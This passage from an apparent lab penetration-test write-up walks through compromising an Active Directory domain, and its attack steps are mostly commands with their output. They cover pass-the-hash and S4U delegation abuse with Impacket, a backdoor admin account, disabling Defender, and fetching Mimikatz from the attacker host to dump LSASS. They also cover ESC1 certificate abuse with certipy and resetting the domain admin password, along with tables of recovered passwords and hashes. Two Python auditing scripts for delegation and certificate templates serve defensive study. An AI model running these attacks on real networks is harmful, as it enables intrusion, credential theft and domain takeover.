         * Password : 4d 75 54 14 3a 7f c6 6c ac d2 c4 b1 04 09 69 82 0a 62 9d 02 7f e3 56 df 86 e2 ac c8 f2 4e ed 39 e7 f2 0c 9f 3c e8 0e a2 dc ae 46 13 28 29 7f 2c ce 3c 50 da 06 b1 eb d7 18 1f 35 b1 87 38 a8 3b a4 6e b2 c3 75 88 36 b6 ae dc 46 18 86 63 c9 cb 4d 63 ae 31 35 49 8c 7e 59 8f 05 ce 5b 5b 1d 5c dd 60 58 b5 ad f3 e0 c4 0d ca 5e e7 93 61 3f e8 48 a9 9e ba 02 7a 9f df 88 84 4e ad 87 81 2d 4e b6 00 36 92 4e 9d 27 03 3f c9 eb a0 05 3b 25 92 c8 55 40 e8 6b bd 9c 6b 0f 7e ef 73 49 67 96 e1 7a 68 35 e0 39 25 50 7b 2a 96 a0 13 7f d1 7f 9a 2b 63 5d 4d 58 ae 15 07 a1 70 02 73 a7 f3 45 80 5d 41 7a bb 8a 6d e1 29 47 a8 84 ca 92 8f a3 27 25 a2 4a 55 df 65 cc 72 5b 7e f2 f2 6d ff d5 07 a3 ec 64 d8 c3 a7 cf 41 b0 c9 25 2e 7a 12 83 07
        ssp :
        credman :
meterpreter >
```
Key credentials recovered:
Local user:
- Username: John (local account)
- Plaintext password: John@123
- NTLM hash: 5ffb08c80d9f260355e01c17a233e8f1
Machine account:
- Username: WIN-PC8086$
- Domain: AEROSPACE
- NTLM hash: 1878248073dc58f665227675e99b8333
The long hex "password" shown for WIN-PC8086$ is the raw machine-account password (random bytes, not typeable); for the machine account the NTLM hash is what gets used, via pass-the-hash, in the next step.
2.3 Discovering constrained delegation#
What is constrained delegation?
In an AD domain, delegation lets one account act on behalf of other users towards a service. Constrained delegation is configured by a domain administrator on the delegating account: here the machine account WIN-PC8086$ is allowed to impersonate users towards the HOST and CIFS services of WIN-PC8098. The permitted target SPNs live in the account's msDS-AllowedToDelegateTo attribute; whether the account may also perform protocol transition, i.e. obtain a ticket on behalf of a user who never authenticated to it with Kerberos, is the TRUSTED_TO_AUTH_FOR_DELEGATION bit of its userAccountControl.
Enumerate the domain's delegation settings with Impacket's findDelegation.py, authenticating as the machine account with the NTLM hash dumped above (pass-the-hash; any domain account can read these attributes):
Locate the script first (on Kali the examples live in /usr/share/doc/python3-impacket/examples and are also installed as the impacket-findDelegation wrapper):
```
find / -name "findDelegation.py" 2>/dev/null
```

```
python3 findDelegation.py aerospace.local/WIN-PC8086\$ -hashes :1878248073dc58f665227675e99b8333 -dc-ip 172.22.10.11
```

Result: WIN-PC8086$ has constrained delegation with protocol transition to the HOST and CIFS services of WIN-PC8098.
Phase 3: WIN-PC8098 (172.22.10.40), constrained delegation attack#
3.1 Obtaining a service ticket via S4U#
Using the S4U extensions (S4U2Self followed by S4U2Proxy), WIN-PC8086$ impersonates Administrator towards the CIFS service of WIN-PC8098:
- S4U2Self: WIN-PC8086$ asks the KDC for a service ticket to itself on behalf of Administrator. Because protocol transition is enabled on the account, the KDC issues it without Administrator ever having authenticated, and marks it forwardable.
- S4U2Proxy: WIN-PC8086$ presents that ticket and asks for a ticket to CIFS/WIN-PC8098 as Administrator. The KDC checks msDS-AllowedToDelegateTo, finds the SPN listed, and returns the service ticket.
```
python3 getST.py aerospace.local/WIN-PC8086\$ -hashes :1878248073dc58f665227675e99b8333 -spn CIFS/WIN-PC8098.aerospace.local -impersonate Administrator -dc-ip 172.22.10.11
```

Note: run this as root or from a directory you can write to. The ccache is saved in the current directory, and /usr/share/doc/python3-impacket/examples is root-owned. Two caveats worth knowing: the impersonated user must not be a member of Protected Users or flagged "account is sensitive and cannot be delegated" (otherwise S4U2Proxy is refused), and since the service name in a ticket is not covered by its encryption, a ticket obtained for CIFS/ can be re-labelled to any other service of the same host (getST.py -altservice), so delegation to HOST and CIFS amounts to full control of WIN-PC8098.
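The classification behind the findDelegation.py result in 2.3 and the S4U2Self/S4U2Proxy reasoning in 3.1 boils down to a handful of userAccountControl bits and two attributes. The following is an added example, not code from the writeup or from Impacket: it classifies constructed account records the way an auditor (or an attacker) would, and answers the two questions that decide whether the attack above works: does protocol transition apply, and which hosts does the SPN list really expose. WIN-PC8086$'s record reflects the writeup's finding; its exact SPN list, the DC's flags and the extra accounts (svc_backup, FILE01$, svc_web) are assumptions for illustration.

```python
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# userAccountControl bits relevant to delegation (MS-SAMR / MS-ADTS).
UF_ACCOUNTDISABLE = 0x2
UF_NORMAL_ACCOUNT = 0x200
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_SERVER_TRUST_ACCOUNT = 0x2000                 # domain controllers
UF_TRUSTED_FOR_DELEGATION = 0x80000              # unconstrained delegation
UF_NOT_DELEGATED = 0x100000                      # "account is sensitive and cannot be delegated"
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000    # constrained delegation with protocol transition


@dataclass
class AdAccount:
    sam_account_name: str
    user_account_control: int
    allowed_to_delegate_to: List[str] = field(default_factory=list)    # msDS-AllowedToDelegateTo
    allowed_to_act_on_behalf: List[str] = field(default_factory=list)   # msDS-AllowedToActOnBehalfOfOtherIdentity, resolved to SAM names


# Constructed sample domain (assumptions except for WIN-PC8086$'s delegation type).
SAMPLE_DOMAIN = [
    AdAccount("DC01$", UF_SERVER_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION),
    AdAccount("WIN-PC8086$", UF_WORKSTATION_TRUST_ACCOUNT | UF_TRUSTED_TO_AUTH_FOR_DELEGATION,
              allowed_to_delegate_to=["HOST/WIN-PC8098.aerospace.local", "HOST/WIN-PC8098",
                                      "CIFS/WIN-PC8098.aerospace.local", "CIFS/WIN-PC8098"]),
    AdAccount("WIN-PC8098$", UF_WORKSTATION_TRUST_ACCOUNT),
    AdAccount("svc_backup", UF_NORMAL_ACCOUNT,
              allowed_to_delegate_to=["MSSQLSvc/SQL01.aerospace.local:1433"]),
    AdAccount("FILE01$", UF_WORKSTATION_TRUST_ACCOUNT, allowed_to_act_on_behalf=["svc_web"]),
]


def classify_delegation(acct: AdAccount) -> Optional[Tuple[str, List[str], str]]:
    """Return (delegation type, targets, how to abuse it), or None if uninteresting."""
    uac = acct.user_account_control
    if uac & (UF_ACCOUNTDISABLE | UF_SERVER_TRUST_ACCOUNT):
        return None   # disabled accounts, and DCs, which are unconstrained by design
    if uac & UF_TRUSTED_FOR_DELEGATION:
        return ("Unconstrained", ["*"],
                "TGTs of everyone who authenticates here are cached in LSASS; coerce a privileged principal to connect, then dump them")
    if acct.allowed_to_delegate_to:
        if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
            return ("Constrained w/ Protocol Transition", list(acct.allowed_to_delegate_to),
                    "S4U2Self yields a forwardable ticket for any user, then S4U2Proxy to the listed SPNs (getST.py -impersonate)")
        return ("Constrained", list(acct.allowed_to_delegate_to),
                "no protocol transition: S4U2Self tickets are not forwardable, so a real Kerberos ticket from the victim is needed before S4U2Proxy")
    if acct.allowed_to_act_on_behalf:
        return ("Resource-Based Constrained Delegation", list(acct.allowed_to_act_on_behalf),
                "the listed accounts may impersonate users to this host; control one of them, or whoever can write the attribute")
    return None


def audit(accounts: List[AdAccount]) -> List[Tuple[str, str, List[str], str]]:
    rows = []
    for acct in accounts:
        result = classify_delegation(acct)
        if result:
            rows.append((acct.sam_account_name, *result))
    return rows


def hosts_behind(spns: List[str]) -> List[str]:
    """Host names the SPNs point at. The service name of a TGS is not covered by the
    ticket's encryption (only the target account's key is), so a ticket for CIFS/host
    can be re-labelled to any other SPN of the same machine account (getST.py
    -altservice); HOST/CIFS delegation therefore exposes the whole host."""
    hosts = set()
    for spn in spns:
        _, _, rest = spn.partition("/")
        hosts.add(rest.split(":")[0].lower())
    return sorted(hosts)


def impersonation_blocked(victim_uac: int, in_protected_users: bool) -> bool:
    """Why -impersonate can fail for a given victim: accounts flagged NOT_DELEGATED and
    members of Protected Users cannot be delegated, so S4U2Proxy for them is refused."""
    return bool(victim_uac & UF_NOT_DELEGATED) or in_protected_users


if __name__ == "__main__":
    for name, kind, targets, note in audit(SAMPLE_DOMAIN):
        print(f"{name:12} {kind:38} -> {', '.join(targets)}")
        print(f"{'':12} hosts: {hosts_behind(targets)}  |  {note}")
```

Run against the sample, only WIN-PC8086$ comes out as "Constrained w/ Protocol Transition", which is exactly the precondition the getST.py command above relies on; DC01$ is skipped even though it carries TRUSTED_FOR_DELEGATION.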
3.2 Logging in with Kerberos authentication#
Point KRB5CCNAME at the saved ticket and add a hosts entry: the target has to be addressed by the FQDN in the SPN, and Kali's resolver does not know the lab's DNS, so resolve the name against the DC and pin it in /etc/hosts:
```
┌──(root㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─# export KRB5CCNAME='Administrator@CIFS_WIN-PC8098.aerospace.local@AEROSPACE.LOCAL.ccache'
# resolve WIN-PC8098 against the DC's DNS and add it to /etc/hosts
┌──(root㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─# nslookup WIN-PC8098.aerospace.local 172.22.10.11
Name:    WIN-PC8098.aerospace.local
Address: 172.22.10.40
┌──(root㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─# echo '172.22.10.40 WIN-PC8098.aerospace.local WIN-PC8098' >> /etc/hosts
```
Get a shell with wmiexec.py (full transcript, including the name-resolution failure before the hosts entry was added):
```
┌──(root㉿kali)-[~]
└─# cd /usr/share/doc/python3-impacket/examples
┌──(root㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─# python3 getST.py aerospace.local/WIN-PC8086\$ -hashes :1878248073dc58f665227675e99b8333 -spn CIFS/WIN-PC8098.aerospace.local -impersonate Administrator -dc-ip 172.22.10.11
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@CIFS_WIN-PC8098.aerospace.local@AEROSPACE.LOCAL.ccache
┌──(root㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─# export KRB5CCNAME='Administrator@CIFS_WIN-PC8098.aerospace.local@AEROSPACE.LOCAL.ccache'
┌──(root㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─# python3 wmiexec.py -k aerospace.local/Administrator@WIN-PC8098.aerospace.local -no-pass -dc-ip 172.22.10.11
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] [Errno Connection error (WIN-PC8098.aerospace.local:445)] [Errno -2] Name or service not known
┌──(root㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─# nslookup WIN-PC8098.aerospace.local 172.22.10.11
Server:  172.22.10.11
Address: 172.22.10.11#53
Name:    WIN-PC8098.aerospace.local
Address: 172.22.10.40
┌──(root㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─# echo '172.22.10.40 WIN-PC8098.aerospace.local WIN-PC8098' >> /etc/hosts
┌──(root㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─# python3 wmiexec.py -k aerospace.local/Administrator@WIN-PC8098.aerospace.local -no-pass -dc-ip 172.22.10.11
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
aerospace\administrator
C:\>
```

3.3 Finding a domain user's processes#
`tasklist /v` shows processes running under the domain user AEROSPACE\liuyuhua, which means that user has a live logon session and their secrets are resident in LSASS:

```
elevation_service.exe 7572 Services 0 AEROSPACE\liuyuhua 0:00:00
GoogleUpdate.exe 7960 Services 0 AEROSPACE\liuyuhua 0:00:00
```
3.4 Bypassing Defender to dump credentials#
Windows Defender is enabled on this host, so it has to be dealt with before Mimikatz can run. The garbled lines in the wmiexec output below are Chinese-locale (code page 936) messages that wmiexec.py decoded as UTF-8; they are rendered in English here, and rerunning wmiexec.py with `-codec gbk` shows them correctly at the source.
Create an administrator user#
```
C:\>net user hacker P@ssw0rd123 /add
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
The command completed successfully.
C:\>net localgroup Administrators hacker /add
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
The command completed successfully.
C:\>
```
Enable Remote Desktop#
```
C:\>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
The operation completed successfully.
C:\>netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
Ok.
C:\>
```
RDP connection#
xfreerdp /v:172.22.10.40 /u:hacker /p:P@ssw0rd123 /cert:ignore

Disable Windows Defender#
After connecting over RDP, open an elevated PowerShell. This disables real-time monitoring only; it has no effect when Tamper Protection is on, so confirm with Get-MpComputerStatus (RealTimeProtectionEnabled, IsTamperProtected) before uploading anything:
Set-MpPreference -DisableRealtimeMonitoring $true

Upload and run Mimikatz#
Mimikatz: https://github.com/ParrotSec/mimikatz
Start an HTTP server on Kali:
python3 -m http.server 8080

Download it from the PowerShell session over RDP:
Invoke-WebRequest -Uri http://192.168.93.128:8080/mimikatz.exe -OutFile C:\Users\hacker\mimikatz.exe

Dump liuyuhua's hash#
Run Mimikatz from the elevated prompt. privilege::debug acquires SeDebugPrivilege (privilege 20), which sekurlsa::logonpasswords needs to read LSASS; the user must also have an active logon session, which the tasklist check in 3.3 confirmed:
```
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
```

liuyuhua's credentials are in the output:
- NTLM hash: 2c8e4ec4d8a61869d85c7921c6076dfd
- plaintext password: Yu%a#E8T6iR
Stage 4: DC01 (172.22.10.11), ADCS certificate attack#
4.1 Vulnerability analysis#
The domain runs ADCS (Active Directory Certificate Services). Enumeration with Certify shows that the certificate template AeroUser is misconfigured (ESC1):
- CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT is set (the requester chooses the certificate subject and SAN)
- all domain users have the Enroll right
Those two settings make the SAN attacker-controlled and reachable. The full ESC1 pattern additionally requires that the template carries an EKU usable for client authentication, requires no CA manager approval and requires no authorized signatures; otherwise the request would be rejected or left pending. The successful request in 4.3 confirms all of these hold for AeroUser.
Plan: as liuyuhua, request a certificate whose SAN carries the domain admin's UPN (Administrator@aerospace.local).
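The conditions listed above are the ones an ESC1 check has to combine. The following is an added example, not code from the write-up and not certipy's or Certify's code: it applies those conditions to template records shaped like the LDAP attributes of objects under CN=Certificate Templates,CN=Public Key Services in the Configuration partition, with an `enroll_principals` list standing in for the Enroll ACEs of the template's security descriptor. The sample templates are constructed: the name AeroUser comes from the page, but every attribute value is assumed, and the contrast template only approximates the stock User template.

```python
"""ESC1 template checker (added example; not the write-up's, certipy's or Certify's code).

Each record mimics the LDAP attributes of a certificate template object plus an
'enroll_principals' list standing in for the Enroll ACEs in its security
descriptor. All sample values below are constructed for illustration.
"""

# Bit values and OIDs as documented in MS-CRTD (certificate template schema).
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag: CA manager approval

# EKUs that let the resulting certificate authenticate a user.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}

# Groups whose Enroll right amounts to "any domain account can enroll".
BROAD_ENROLLERS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}


def esc1_findings(template: dict) -> list:
    """Return the ESC1 conditions this template meets, as readable strings.

    Classic ESC1 needs all five. A partial list is still useful: it names the
    one setting (manager approval, a signature requirement, a restricted ACL)
    that currently blocks the attack and therefore must not be relaxed.
    """
    hits = []
    # LDAP returns the flag attributes as signed 32-bit ints; masking a negative
    # Python int still tests the low bits correctly.
    if template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        hits.append("enrollee supplies subject (SAN chosen by the requester)")
    ekus = set(template.get("pKIExtendedKeyUsage", []))
    if not ekus or ekus & AUTH_EKUS:  # a template with no EKU at all also allows client auth
        hits.append("usable for client authentication")
    if not template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        hits.append("no CA manager approval")
    if template["msPKI-RA-Signature"] == 0:
        hits.append("no authorized signatures required")
    if BROAD_ENROLLERS & set(template["enroll_principals"]):
        hits.append("low-privileged principals can enroll")
    return hits


def is_esc1(template: dict) -> bool:
    return len(esc1_findings(template)) == 5


def scan(templates: list) -> dict:
    """Map template name -> findings, most exposed templates first."""
    result = {t["name"]: esc1_findings(t) for t in templates}
    return dict(sorted(result.items(), key=lambda kv: -len(kv[1])))


# Constructed sample templates (attribute values assumed, not dumped from the lab).
AERO_USER = {
    "name": "AeroUser",
    "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "msPKI-Enrollment-Flag": 0,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.10.3.4"],  # Client Auth, EFS
    "enroll_principals": ["Domain Users"],
}

# The same template with "CA certificate manager approval" ticked: one flag closes the path.
AERO_USER_GATED = {**AERO_USER, "name": "AeroUser-gated",
                   "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS}

# A User-style template: subject and SAN are built from the AD object, so the requester
# cannot put Administrator's UPN in the SAN. 0xA6000000 = SUBJECT_REQUIRE_DIRECTORY_PATH |
# SUBJECT_REQUIRE_EMAIL | SUBJECT_ALT_REQUIRE_EMAIL | SUBJECT_ALT_REQUIRE_UPN, stored
# as the signed value -1509949440.
USER_STYLE = {
    "name": "User",
    "msPKI-Certificate-Name-Flag": 0xA6000000 - (1 << 32),
    "msPKI-Enrollment-Flag": 0x29,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4", "1.3.6.1.4.1.311.10.3.4"],
    "enroll_principals": ["Domain Users"],
}

if __name__ == "__main__":
    for name, hits in scan([AERO_USER, AERO_USER_GATED, USER_STYLE]).items():
        tag = "ESC1" if len(hits) == 5 else "ok  "
        print(f"[{tag}] {name}: {'; '.join(hits) or 'no ESC1 conditions met'}")
```

Feeding it real data means pulling those attributes from the Configuration partition and translating the template's DACL into enroll principals; the per-condition output is what you want when deciding which single change (requiring manager approval, clearing the enrollee-supplies-subject flag, or tightening Enroll) is enough to close the template.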
4.2 Add hosts entries#
```
┌──(root㉿kali)-[~]
└─# echo '172.22.10.13 CA.aerospace.local CA' >> /etc/hosts
┌──(root㉿kali)-[~]
└─# echo '172.22.10.11 DC01.aerospace.local DC01' >> /etc/hosts
```
4.3 Request a certificate for the domain admin#
The `-upn` is what matters for ESC1; `-dns DC01.aerospace.local` additionally puts the DC's DNS name into the SAN, which is why certipy reports a certificate with multiple identities. `-ns` and `-dc-ip` make certipy resolve names through the DC's DNS:
```
┌──(root㉿kali)-[~]
└─# certipy-ad req -username liuyuhua@aerospace.local -hashes :2c8e4ec4d8a61869d85c7921c6076dfd -ca aerospace-CA-CA -target CA.aerospace.local -template AeroUser -upn Administrator@aerospace.local -dns DC01.aerospace.local -dc-ip 172.22.10.11 -ns 172.22.10.11 -debug
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[+] DC host (-dc-host) not specified. Using domain as DC host
[+] Nameserver: '172.22.10.11'
[+] DC IP: '172.22.10.11'
[+] DC Host: 'AEROSPACE.LOCAL'
[+] Target IP: None
[+] Remote Name: 'CA.aerospace.local'
[+] Domain: 'AEROSPACE.LOCAL'
[+] Username: 'LIUYUHUA'
[+] Trying to resolve 'CA.aerospace.local' at '172.22.10.11'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:172.22.10.13[\pipe\cert]
[+] Connected to endpoint: ncacn_np:172.22.10.13[\pipe\cert]
[*] Request ID is 7
[*] Successfully requested certificate
[*] Got certificate with multiple identities
UPN: 'Administrator@aerospace.local'
DNS Host Name: 'DC01.aerospace.local'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator_dc01.pfx'
[+] Attempting to write data to 'administrator_dc01.pfx'
[+] Data written to 'administrator_dc01.pfx'
[*] Wrote certificate and private key to 'administrator_dc01.pfx'
```
4.4 Authenticate with the certificate and take over the domain admin#
The DC does not support PKINIT here: certipy auth fails with KDC_ERR_PADATA_TYPE_NOSUPP, which usually means the DC has no certificate suitable for the KDC role installed, so the certificate cannot be exchanged for a TGT. Instead, authenticate to LDAPS with the certificate over Schannel and use certipy's LDAP shell to reset the domain admin's password. Two caveats. The certificate carries no SID extension (certipy's "Certificate has no object SID" notice); on a DC that enforces strong certificate mapping (KB5014754 full enforcement) such a certificate may be rejected for Schannel as well as PKINIT, and certipy's -sid option exists for that case. And resetting Administrator's password is the loudest option available; the same shell can add a controlled account to a privileged group (add_user_to_group) or configure RBCD on a host (set_rbcd) without touching a production credential.
```
┌──(root㉿kali)-[~]
└─# certipy-ad auth -pfx administrator_dc01.pfx -dc-ip 172.22.10.11 -ldap-shell
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'Administrator@aerospace.local'
[*] SAN DNS Host Name: 'DC01.aerospace.local'
[*] Connecting to 'ldaps://172.22.10.11:636'
[*] Authenticated to '172.22.10.11' as: 'u:AEROSPACE\\Administrator'
Type help for list of commands
# help
add_computer computer [password] [nospns] - Adds a new computer to the domain with the specified password. If nospns is specified, computer will be created with only a single necessary HOST SPN. Requires LDAPS.
rename_computer current_name new_name - Sets the SAMAccountName attribute on a computer object to a new value.
add_user new_user [parent] - Creates a new user.
add_user_to_group user group - Adds a user to a group.
change_password user [password] - Attempt to change a given user's password. Requires LDAPS.
clear_rbcd target - Clear the resource based constrained delegation configuration information.
clear_shadow_creds target - Clear shadow credentials on the target (sAMAccountName).
disable_account user - Disable the user's account.
enable_account user - Enable the user's account.
dump - Dumps the domain.
search query [attributes,] - Search users and groups by name, distinguishedName and sAMAccountName.
get_user_groups user - Retrieves all groups this user is a member of.
get_group_users group - Retrieves all members of a group.
get_laps_password computer - Retrieves the LAPS passwords associated with a given computer (sAMAccountName).
grant_control [search_base] target grantee - Grant full control on a given target object (sAMAccountName or search filter, optional search base) to the grantee (sAMAccountName).
set_dontreqpreauth user true/false - Set the don't require pre-authentication flag to true or false.
set_rbcd target grantee - Grant the grantee (sAMAccountName) the ability to perform RBCD to the target (sAMAccountName).
set_shadow_creds target - Set shadow credentials on the target object (sAMAccountName).
start_tls - Send a StartTLS command to upgrade from LDAP to LDAPS. Use this to bypass channel binding for operations necessitating an encrypted channel.
write_gpo_dacl user gpoSID - Write a full control ACE to the gpo for the given user. The gpoSID must be entered surrounding by {}.
whoami - get connected user
dirsync - Dirsync requested attributes
exit - Terminates this session.
# whoami
u:AEROSPACE\Administrator
# change_password Administrator P@ssw0rd2024!
Got User DN: CN=Administrator,CN=Users,DC=aerospace,DC=local
Attempting to set new password of: P@ssw0rd2024!
Password changed successfully!
#
```
4.5 Lateral movement: taking DC01#
With the reset domain admin password, get a shell on the domain controller over WMI. The ipconfig output was GBK text that wmiexec decoded as UTF-8; it is rendered in English below, and `-codec gbk` fixes it at the source:
```
┌──(root㉿kali)-[~]
└─# python3 /usr/share/doc/python3-impacket/examples/wmiexec.py aerospace.local/Administrator:'P@ssw0rd2024!'@DC01.aerospace.local -dc-ip 172.22.10.11
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
aerospace\administrator
C:\>ipconfig /all
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
Windows IP Configuration
   Host Name . . . . . . . . . . . . : DC01
   Primary Dns Suffix  . . . . . . . : aerospace.local
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : aerospace.local
Ethernet adapter Ethernet0:
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-0A-B5-7D
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::999b:7dc:74ef:5f1b%5(Preferred)
   IPv4 Address. . . . . . . . . . . : 172.22.10.11(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.22.10.1
   DHCPv6 IAID . . . . . . . . . . . : 50334761
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-31-4F-BF-E8-00-0C-29-0A-B5-7D
   DNS Servers . . . . . . . . . . . : ::1
                                       127.0.0.1
   NetBIOS over Tcpip. . . . . . . . : Enabled
Tunnel adapter isatap.{738F0B3D-58F3-4C8E-91B7-D4461A6E8BCC}:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
C:\>
```
DC01 owned.
Stage 5: CA (172.22.10.13), lateral movement#
The same domain admin password gives a shell on the CA server over WMI. Note that `-dc-ip` below points at the CA rather than the DC; wmiexec.py only consults it for Kerberos logins, so it is harmless with password authentication, but 172.22.10.11 is the correct value. The ipconfig output is again rendered in English:
```
┌──(root㉿kali)-[~]
└─# python3 /usr/share/doc/python3-impacket/examples/wmiexec.py aerospace.local/Administrator:'P@ssw0rd2024!'@CA.aerospace.local -dc-ip 172.22.10.13
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
aerospace\administrator
C:\>ipconfig /all
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
Windows IP Configuration
   Host Name . . . . . . . . . . . . : CA
   Primary Dns Suffix  . . . . . . . : aerospace.local
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : aerospace.local
Ethernet adapter Ethernet0:
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-C0-A7-E3
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::6c5e:c9fa:6c0e:8631%7(Preferred)
   IPv4 Address. . . . . . . . . . . : 172.22.10.13(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.22.10.1
   DHCPv6 IAID . . . . . . . . . . . : 50334761
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-31-4F-BF-E8-00-0C-29-C0-A7-E3
   DNS Servers . . . . . . . . . . . : 172.22.10.11
   NetBIOS over Tcpip. . . . . . . . : Enabled
Tunnel adapter isatap.{5CEEAE8C-B32F-4748-9055-D376DCB758DA}:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
C:\>
```
CA owned. All five machines are now compromised.
Summary#
All credentials obtained#
| Host | Account | Type | Plaintext password | NTLM hash |
|---|---|---|---|---|
| Web01 (172.22.10.22) | sa | MSSQL sa | 123456 | - |
| WIN-PC8086 (172.22.10.36) | John | local user | John@123 | 5ffb08c80d9f260355e01c17a233e8f1 |
| WIN-PC8086 (172.22.10.36) | WIN-PC8086$ | machine account | - | 1878248073dc58f665227675e99b8333 |
| WIN-PC8098 (172.22.10.40) | hacker | local administrator (created) | P@ssw0rd123 | 89551acff8895768e489bb3054af94fd |
| WIN-PC8098 (172.22.10.40) | WIN-PC8098$ | machine account | - | 4b871bde5de48e8b344eeba86e8c08ee |
| aerospace.local domain | liuyuhua | domain user | Yu%a#E8T6iR | 2c8e4ec4d8a61869d85c7921c6076dfd |
| aerospace.local domain | Administrator | domain admin | P@ssw0rd2024! (reset) | - |
Machines compromised#
| Host | IP | Privilege obtained | Technique |
|---|---|---|---|
| Web01 | 192.168.93.146 / 172.22.10.22 | NT AUTHORITY\SYSTEM | MSSQL xp_cmdshell + GodPotato privilege escalation |
